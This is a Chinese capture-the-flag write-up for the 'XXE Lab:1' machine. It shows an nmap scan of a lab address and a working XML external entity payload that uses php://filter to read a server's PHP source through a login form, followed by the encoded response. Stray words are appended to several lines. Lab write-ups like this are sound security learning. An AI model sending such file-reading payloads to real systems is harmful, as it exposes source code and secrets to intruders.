XXE Lab:1題解

思路

題目已經提示是XXE的專項練習,因此,直接找XXE問題.php

難度

入門html

端口掃描

nmap -sS -A 10.129.10.64

發現HTTP服務、Apache 2.4.27中間件、robots.txt泄漏了目錄和文件
XXE Lab:1題解ide

80端口檢查

其中,/xxe/index.php頁面經過xml格式提交用戶名和密碼,因而,此處即爲XXE所在位置。
構造以下payload,讀取頁面源碼,得到一不知是flag仍是flag Hint的內容:code

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]>
<root><name>&admin;</name><password>123</password></root>

響應:xml

<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->

因而,陷入矇蔽。。。。等待做者反饋中htm

相關文章
相關標籤/搜索